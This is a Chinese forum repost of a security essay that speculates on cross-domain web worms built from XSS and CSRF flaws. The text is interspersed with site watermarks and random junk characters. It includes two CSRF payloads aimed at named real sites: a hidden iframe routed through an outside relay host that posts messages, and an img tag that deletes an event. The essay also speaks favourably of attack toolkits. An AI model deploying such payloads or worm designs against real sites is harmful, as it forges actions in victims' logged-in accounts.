小迷糊

作者：余弦
* k; L* {# `9 s' D4 ^我爱电脑技术论坛来源：0×37 Security
: S# S6 Z7 k( h: |4 W- n电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站3 |% `" \; f# I8 B8 M; ]% w
这几天分析了几个大网站的XSS&CSRF漏洞，又开始思考跨域蠕虫的问题。QZ修饰鬼页后发现了在IE6下跨域的BUG，这个发现带来的冲击可不仅仅是盗cookie那么简单:)，不过我下面要提到的跨域蠕虫与这个BUG无关，本文纯属YY一下。
) w8 e5 Z% Z: C* }www.520diannao.com我爱电脑技术社区--打造最好的电脑技术自学交流平台1 w" f) J/ B+ _
XSS Worm的流行离不开SNS网络，技术核心非XMLHttpRequest对象莫属，我写了几个SNS网络的Worm，如果这几个Worm之间可以互相通 信的话（突破自身无法跨域的缺陷），那危害将会更大，会更有趣:)。首先我们要明确Webx.0世界中的Worm的生存条件以及它们是如何繁殖的（略）。 要让Worm之间通信，方法有很多。
- k' l; }+ p/ Xwww.520diannao.com打造最好的电脑自学交流论坛! F1 w4 h) v6 T2 p8 |( k& {, B
一、Mail-to-Mail Worm：www.520diannao.com; w7 l, z+ p& o5 `5 ]0 E, l
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站6 {0 K& [' {7 A( }; K" \
邮箱之间 可以互发邮件，Mail Worm可以借助这点将payload(XSS Trap)传播到不同的邮箱服务上，当然这时的payload几乎是不一样的。比如sohu mail的XSS Worm与QQ mail的XSS Worm，他们的通信渠道就完全可以借用邮件本身的互发功能。这两个不同mail环境下的Worm的DOM逻辑肯定不会一样，不过基本的功能模块可以共 享，比如XMLHttpRequest对象以及一些基本自定义函数等，这样的跨域Worm必须具备判断自身所处环境的能力，这个很简单。打造最好的电脑自学交流论坛! z6 N5 s0 `, l8 e- B! F

, G" v  e( [# S0 C) O6 l* w$ A我爱电脑技术论坛这个是跨域蠕虫最简单的模型。
9 Z1 g8 i. _$ Q打造最好的电脑自学交流论坛电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站4 u) ^8 [$ |& n. U  \
二、CSRF Worm：
9 G& b. a1 P, |7 d, I: A
6 |4 l( ?& _: U6 s/ B: a* y, A8 \6 B电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站这 种模式的跨域蠕虫要借用CSRF漏洞。比如我在myspace.cn上爆发了一个XSS Worm，而yeeyan.com上存在很低级的CSRF漏洞，我要如何将myspace上的威胁带到yeeyan上呢？这时就可以在 myspace.cn上的XSS Worm中加入这样的代码：电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站* `( s0 b4 R5 C. E  b- w) x; e

; F: H+ i! c9 Z0 y! S: H- \: g我爱电脑技术社区--打造最好的电脑技术自学交流平台<iframe src=http://www.0×37.com/Project/csrf/do.asp?csrf=http://www.yeeyan.com/groups/newTopic/&data[Post][content]=HI+CSRF:)&ymsggroup=&ymsgee=19076&ymsgee_username=19076 width=0 height=0></iframe>
3 d; F3 z0 ?1 B7 |: Q7 [& i电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
5 G1 u/ F$ f) ~! z打造最好的电脑自学交流论坛如果是简单的发送请求的话，可以：打造最好的电脑自学交流论坛  |2 K7 S. k9 O; ]) f
打造最好的电脑自学交流论坛( X5 e( K% v( i8 S4 S8 E! |- u
<img src=http://www.yeeyan.com/space/deleteEvent/15728>打造最好的电脑自学交流论坛" q* K8 r6 d$ ]7 O9 i  n& b
www.520diannao.com7 F5 q6 k9 ?. I# H7 Z5 P
我 假设myspace.cn与yeeyan.com有某种合作关系，用户经常需要这两者提供的服务，并都登陆了这两个SNS网络，那么当myspace的用 户A被XSS Worm感染之后就会发送CSRF请求给yeeyan的用户B（A与B在现实世界是同一个人），那么用户B就会自动在yeeyan上发布一条留言。而如果 此留言本身就是一个XSS Trap呢？或者是一条针对yeeyan.com的CSRF欺骗信息？呵呵，至于蠕虫是如何繁殖的，这是一种艺术:)。打造最好的电脑自学交流论坛! b) E+ S0 `( g! S

/ s; p# m2 h# g/ w2 g电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站三、网马中枢：
" N2 l3 M1 \. i: s! ]
. x6 u- \2 q" z/ T0 z; j1 T0 l  i电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站又 提到这个概念了。这样的中枢不应该局限于挂马技术的应用上，独立的Web2.0 Worm需要一个控制中心，以保证本来没任何关系的Worm之间可以互相通信。而网马中枢就是这个通信的中间枢纽:)。网马中枢还应该做到对网马与 Web2.0 Worm的实时控制。这个不是没有，而是还不够完善。我说过，发展这个中枢这需要结合复杂的服务端技术。这已经是一种发展趋势。我爱电脑技术论坛- H1 y8 s% r4 z( N& d
打造最好的电脑自学交流论坛" O% m. a/ U0 t" ?5 j& i: {+ e2 e( |
四、其它通信方式：
& h8 B2 t9 L! ~0 a我爱电脑技术论坛我爱电脑技术社区--打造最好的电脑技术自学交流平台2 }" @5 o3 |' y! K$ I0 A2 r3 X2 G3 \. ^
很多，我不继续YY了……www.520diannao.com: _6 e- X2 W: Y. B$ V& N6 e

4 Y; d* h$ r, W3 B1 Q我爱电脑技术论坛还是那句话：网马中枢才是王道。这类工具如：MPack Toolkit、BeEF、XSS SHELL等都挺不错。至于跨域嘛……也许根本就不需要这么麻烦。